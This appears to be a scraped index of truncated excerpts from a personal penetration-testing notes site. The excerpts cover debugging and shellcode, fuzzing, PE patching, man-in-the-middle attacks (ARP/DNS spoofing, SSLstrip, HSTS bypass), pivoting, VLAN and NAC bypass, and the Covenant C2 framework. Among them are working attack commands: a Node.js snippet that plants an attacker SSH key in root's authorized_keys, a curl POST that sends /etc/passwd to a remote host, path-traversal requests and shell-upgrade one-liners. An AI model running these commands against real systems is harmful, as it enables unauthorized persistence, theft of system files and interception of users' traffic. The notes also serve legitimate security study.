https://gtfobins.github.io/gtfobins/snap/
General purpose debugger. Hint: gdb disables ASLR by default. Commands General set disassembly-flavor intel/att Process handling run runs a program without parameters run `python -c 'print("a")'` runs a program with a parameter run < <(python -c 'print("a")') runs a program and enters the given string into STDIN c continue si step one instruction Breakpoints break $f…
See also the Buffer Overflow post Execute shellcode Scenario: You have shellcode. You want to run it to analyze it in a debugger. On Windows Add the shellcode after the breakpoint, compile with i686-w64-mingw32-cc s.c -o s.exe or x86_64-w64-mingw32-cc s.c -o s.exe and run it in a debugger. On Linux Add the shellcode after the breakpoint with gcc [-m32] s.c…
Bugs can only be found during fuzzing in code which is actually executed. But which parts of the code of a target system are executed during a fuzzing session? And how can we improve our fuzzer to also include tests for code blocks which weren’t covered before? Dynamorio We’ll now use Dynamorio — a runtime code manipulation…
Scapy fundamentals Commands for the interactive scapy interpreter: conf.iface shows the currently used interface conf.iface='tun0' sets the interface to use ls shows all protocols ls(TCP) shows all known headers for a given protocol lsc shows built-in functions Details about a packet p: p shows general information p.summary() also shows general information p.show() shows each field and…
PE (Portable Executable) or DLL (Dynamic Link Library) files can be edited to remove or add capabilities or your own code. Read and modify a PE file The following Python3 script reads a file, prints out a header, modifies it to remove ASLR and writes a new file without this flag. import pefile; f = pefile.PE('filename.exe'); print(hex(f.OPTIONAL_HEADER.DllCharacteristics))  # print as hex to…
This page contains various unstructured notes about crypto related things. General notes If you find somewhere that something should be random, but it isn’t, this is already an important finding. Stream Ciphers A stream cipher encrypts a cleartext bit by bit or character by character (normally via XOR) with a secret key. It produces a…
mitmdump is a proxy which can store and modify content. Change content of a third-party site Scenario: You want to manipulate some content from a website $target visits. Perform ARP poisoning with Bettercap, Ettercap, the http_hijack.py script or some other way. Start mitmdump in transparent mode: mitmdump --mode transparent --replace /~s/wars/trek/ or alternatively, to read the new content from a…
Bypass HSTS is based on hostnames. If a target already visited www.supersite.example, you can try to redirect the target to a similar domain which the browser never visited before and which thus doesn’t have HSTS activated. Rewrite the Host HTTP header for the server you want to impersonate and add another character, e.g. wwww.supersite.example. You prepared…
SSLstrip works as a proxy which replaces HTTPS references in HTTP, HTML, JS, … responses with HTTP versions. Installation: SSLstrip is old. Create a venv and install an older version of twisted: venv/bin/pip install Twisted==18.9.0 Remove HTTPS references via MitM Scenario: You want $target to route all HTTP traffic through your own system. Your system should remove each…
Socat If Socat is not on the target system, upload a static binary. This will listen to port 5555 and forward it to the given IP on the given port deeper in the target’s network: socat -ddd TCP-LISTEN:5555,reuseaddr,fork TCP:10.4.247.215:5432 Proxychains ! If proxychains is slow, especially while port scanning, try to reduce the following parameters:…
This is an overview blog post. MitM Ettercap Bettercap L2 Scapy L2 mitmdump L3 Loki Various VLAN attacks NAC Network admission control Other tools and notes: Use http_hijack.py (in the P151 script directory) to quickly set up a MitM. Check if you can see OSPF packets. Inspect them in Wireshark for the Auth Type field. If this is…
Network packet manipulation shell and library for Python. (Github)
An Ettercap successor, written in Go. Basic commands: Passive ARP probing: net.recon on net.recon off Active probing: net.probe on net.probe off Sniffing: set net.sniff.output /tmp/sniff.pcap // optional net.sniff on net.sniff off Spoofing: set arp.spoof.targets $target1, $target2, $target3 arp.spoof on arp.spoof off DNS Spoofing: set dns.spoof.domains target.domain // the domain which should be resolved as… set…
Definitions: A trunk connection is a connection between two switches. Tools Yersinia is a layer 2 modification framework. VoIPHopper is a simple tool which can sniff VoIP traffic and output the VLAN ID from the VoIP network: voiphopper -c 0 -i eth0 Enumerate existing VLANs Start Yersinia: yersinia -I Press g Select DTP Press 5 to see…
Caution: Don’t change the MAC address via a remote session because of reasons… Linux ifconfig eth0 hw ether 00:01:02:03:04:05 Mac ifconfig en0 ether 00:01:02:03:04:05 Windows macshift e.g.
Techniques which decide if a new device can join the normal or a special network. A captive portal forces a client to an authentication page. After authentication in a normal low-security environment (where you cannot assume preconfigured systems) the authentication is usually granted to a combination of MAC and IP. Therefore, try to sniff valid…
.NET attack framework: https://github.com/cobbr/Covenant Usage Create a listener on the attack system. Add a launcher to the listener. The attack system now provides a payload file the victim has to start. You can use UrbanBishop to inject the payload into a running process. As soon as the payload is executed, Covenant will show on the dashboard…
Execute command: const { exec } = require("child_process"); exec("echo 'ssh-rsa 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 root@imac2019-kali' > /root/.ssh/authorized_keys", (error, stdout, stderr) => { if (error) { console.log(`error: ${error.message}`); return; } if (stderr) { console.log(`stderr: ${stderr}`); return; } console.log(`stdout: ${stdout}`); });
Write into a file: curl $url -o /tmp/f.txt or curl $url --output /tmp/f.txt or curl $url > /tmp/f.txt Post a local file: curl -X POST --data-binary @/etc/passwd http://192.168.49.53:21/ Execute command and return the result: curl -d q=`id` http://localhost:21/ With a header curl --header "Host: localhost" 10.10.10.10 Use the path as given, including ../ (useful for path traversal attacks): curl --path-as-is $target:$port/public/../../../etc/passwd
Personal collection of some infosec stuff. Primary purpose of this site is to collect and organize for myself.
Note: Some content is not publicly visible due to copyright issues. Therefore, some links could be broken.
python -c 'import pty;pty.spawn("/bin/bash")';
python3 -c 'import pty;pty.spawn("/bin/bash")';